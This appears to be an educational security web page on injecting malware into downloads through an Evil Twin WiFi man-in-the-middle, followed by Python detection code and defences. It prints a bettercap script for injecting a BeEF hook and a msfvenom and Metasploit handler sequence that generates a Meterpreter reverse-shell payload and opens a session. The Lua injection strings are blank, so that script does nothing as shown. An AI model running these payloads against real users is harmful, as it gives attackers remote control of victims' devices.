
WiFi Attack

Malware Injection via WiFi


MalwareZero Research Team Updated April 2026

How Malware Gets Injected Over WiFi

When a victim browses an HTTP site through the attacker's Evil Twin, the attacker can read and modify any part of the HTTP response — including HTML, JavaScript, and downloadable files. The attacker injects malicious code into responses that the victim's browser then executes.

Malware Injection Flow:

[Victim Browser] ──── HTTP GET /downloads/app.exe ────→ [Attacker MITM]
[Attacker MITM]  ──── HTTP GET /downloads/app.exe ────→ [Real Server]
[Real Server]    ←─── Legitimate app.exe ──── [Attacker MITM]
[Attacker]       ──── app.exe + embedded Meterpreter payload ────→ [Victim]
[Attacker]       ←─── Meterpreter connection (port 4444) ──── [Victim]

[Victim thinks they downloaded a legitimate app]
[Actually: infected with remote access trojan]
[Attacker now has full control of victim device]

Evil Twin + Proxy Injection with bettercap

The bettercap proxy module intercepts HTTP traffic and can inject JavaScript, replace binaries, or modify HTML on the fly.

$ sudo bettercap -eval "set http.proxy.on true; http.proxy.script /tmp/inject-beef.lua"



-- inject-beef.lua — injects BeEF hook into HTTP pages
function onResponseHeaders(req, res)
  if HTTP.isHtml(res) then
    res:addHeader("X-Injected-By", "beef")
    local body = res.body
    -- the tag the script searches for and the hook markup it substitutes
    -- did not survive page extraction; the literals are shown empty
    if string.find(body, "") then
      body = string.gsub(body, "", '')
      res.body = body
    end
  end
end



[Every HTTP page the victim visits now contains the BeEF hook]

[Attacker can now run commands in the victim's browser via BeEF panel]
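The trace an injected hook leaves in a page is a script element loading from a host the site never used. The following is an added, defender-side example (not code from this page, from bettercap or from BeEF) that parses an HTML document and reports every script src whose host is neither the page's own nor on an allowlist of known third parties. The sample page, the shop and CDN hostnames and the 198.51.100.23 address are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptSourceCollector(HTMLParser):
    """Collect the src attribute of every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser hands us lowercased tag and attribute names
        if tag != "script":
            return
        for name, value in attrs:
            if name == "src" and value:
                self.sources.append(value)


def foreign_script_sources(html, page_url, allowed_hosts=()):
    """Return the script src values that load from a host other than the
    page's own host or an explicitly allowed one (e.g. a CDN the site is
    known to use). Relative paths are same-origin and are never reported."""
    page_host = urlparse(page_url).hostname
    allowed = {page_host, *(h.lower() for h in allowed_hosts)}
    collector = ScriptSourceCollector()
    collector.feed(html)
    flagged = []
    for src in collector.sources:
        # hostname is None for relative paths; protocol-relative '//host/x.js'
        # and absolute URLs both yield a lowercased host
        host = urlparse(src).hostname
        if host is not None and host not in allowed:
            flagged.append(src)
    return flagged


# Constructed sample: the site's own script and a script from a CDN it is
# known to use are legitimate; the third element points at an address that
# belongs to neither, which is what an injected hook looks like in the HTML.
SAMPLE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="http://198.51.100.23:3000/hook.js"></script>
</head><body><p>Checkout</p></body></html>"""


def demo():
    return foreign_script_sources(
        SAMPLE_PAGE,
        "http://shop.example.com/checkout",
        allowed_hosts=("cdn.example.net",),
    )


if __name__ == "__main__":
    for src in demo():
        print("foreign script:", src)
```

Run over a response captured from a suspect network, the list is the set of script origins to investigate; an empty allowlist is the strict setting, reporting every cross-host script.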

Metasploit Meterpreter Payload Generation

For binary payload injection, the attacker generates a Metasploit Meterpreter payload and injects it into legitimate downloads. Meterpreter provides a full-featured remote shell with file system access, process management, keylogging, and module extensibility.

$ # Generate a Meterpreter payload (for authorized testing only)
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.1.1 LPORT=4444 \
    -f exe -o /tmp/update.exe

[-] No platform was selected, making windows/x64
[+] Generated payload: 51,824 bytes

# Start Metasploit handler
$ msfconsole -q -x "
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.1
set LPORT 4444
run -j
"

[*] Started reverse TCP handler on 192.168.1.1:4444
[*] Sending stage (176219 bytes) to 192.168.1.147
[*] Meterpreter session 1 opened

[Attacker now has Meterpreter shell on victim machine]

Why This Works Despite HTTPS

The injection happens at the binary level: the attacker replaces a legitimate download (say, a PDF or an installer) with an infected version. If the victim fetches the file from a plain-HTTP site, the attacker can modify it in transit. An HTTPS site cannot be modified in transit without a certificate substitution the browser would warn about, so against HTTPS the attacker instead obtains a valid certificate for a similar-looking domain and tricks the victim into downloading from there; if that works, the injection succeeds just the same. HTTPS protects the content of a connection, but it does not stop a malicious binary from being served when the attacker either sits in the path of an HTTP download or is the endpoint the victim has been lured to.

How to Detect Malicious Downloads

  • Check file hash: Verify the SHA-256 hash of any downloaded file against the official publisher's hash
  • Check file size: Unexpectedly large or small files compared to the expected download are suspicious
  • Code signing verification: On Windows, right-click the file → Properties → Digital Signatures. Verify the signature is from the legitimate publisher and the certificate is valid.
  • Antivirus scanning: Upload the file to VirusTotal.com before running it
  • Network monitoring: Unexpected outbound connections from your device (especially to port 4444 or unusual ports) indicate compromise
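The hash, size and network checks in the list above can be scripted. The block below is an added example, not code from this page: verify_download compares a downloaded file's SHA-256 (streamed, compared in constant time) and size against values the publisher would publish, and flag_suspicious_connections walks netstat-style connection lines and returns established outbound connections to port 4444 or to any port outside the expected set. The installer bytes, the published hash and the connection lines are constructed sample data, not real indicators; 192.168.1.1 and 192.168.1.147 are the addresses from the walkthrough above and 203.0.113.5 is a documentation address.

```python
import hashlib
import hmac
import os
import tempfile

# Port used by the listener in the walkthrough above; extend this with
# whatever your environment considers unexpected for a workstation.
KNOWN_LISTENER_PORTS = {4444}


def sha256_of_file(path, chunk_size=1 << 16):
    """Stream the file so a large installer does not have to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_download(path, expected_sha256, expected_size=None):
    """Return a list of problems; an empty list means the file matches the
    published hash (and the published size, when one is given)."""
    problems = []
    actual_size = os.path.getsize(path)
    if expected_size is not None and actual_size != expected_size:
        problems.append(f"size mismatch: {actual_size} bytes, expected {expected_size}")
    actual = sha256_of_file(path)
    if not hmac.compare_digest(actual, expected_sha256.strip().lower()):
        problems.append(f"sha256 mismatch: file hashes to {actual}")
    return problems


def flag_suspicious_connections(lines, expected_ports=(80, 443)):
    """Parse 'proto local remote state' lines (netstat/ss style) and return
    (remote_host, remote_port) for ESTABLISHED connections to a known
    listener port or to any port outside expected_ports."""
    flagged = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4 or parts[3] != "ESTABLISHED":
            continue
        host, _, port_text = parts[2].rpartition(":")
        if not port_text.isdigit():
            continue
        port = int(port_text)
        if port in KNOWN_LISTENER_PORTS or port not in expected_ports:
            flagged.append((host, port))
    return flagged


# Constructed sample lines in the style of `netstat -an` output.
SAMPLE_CONNECTIONS = [
    "tcp 192.168.1.147:52311 203.0.113.5:443 ESTABLISHED",
    "tcp 192.168.1.147:52318 192.168.1.1:4444 ESTABLISHED",
    "tcp 192.168.1.147:52320 192.168.1.1:80 TIME_WAIT",
]


def demo_verify():
    """Write a genuine file and a tampered copy, then check both against the
    hash the publisher would have published for the genuine one."""
    genuine = b"installer bytes as shipped by the publisher\n"
    published_hash = hashlib.sha256(genuine).hexdigest()  # stands in for the vendor's page
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "setup.exe")
        bad = os.path.join(tmp, "setup_modified.exe")
        with open(good, "wb") as fh:
            fh.write(genuine)
        with open(bad, "wb") as fh:
            fh.write(genuine + b"X" * 64)  # appended bytes stand in for a modification
        good_problems = verify_download(good, published_hash, len(genuine))
        bad_problems = verify_download(bad, published_hash, len(genuine))
    return good_problems, bad_problems


if __name__ == "__main__":
    good, bad = demo_verify()
    print("genuine file:", good or "ok")
    print("modified file:", bad)
    print("suspicious connections:", flag_suspicious_connections(SAMPLE_CONNECTIONS))
```

The size check is cheap and catches the crude case where a payload is appended; the hash check catches everything else, provided the expected hash was obtained over a channel the attacker does not control (the publisher's HTTPS page, not the same download page seen through the suspect network).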

Defense Against Malware Injection

  • HTTPS everywhere: Only download files over HTTPS — injection into HTTPS requires certificate substitution, which triggers browser warnings
  • Code signing enforcement: Enable Windows Smart App Control or macOS Gatekeeper to block unverified executables
  • Endpoint protection: Modern EDR solutions detect process injection, unusual outbound connections, and Meterpreter behavior
  • VPN: Encrypts all traffic, preventing proxy injection at the network level
  • Application whitelisting: Block execution of unsigned executables, especially from browser download folders
  • Don't download from HTTP sites: Any site still using plain HTTP is a malware injection risk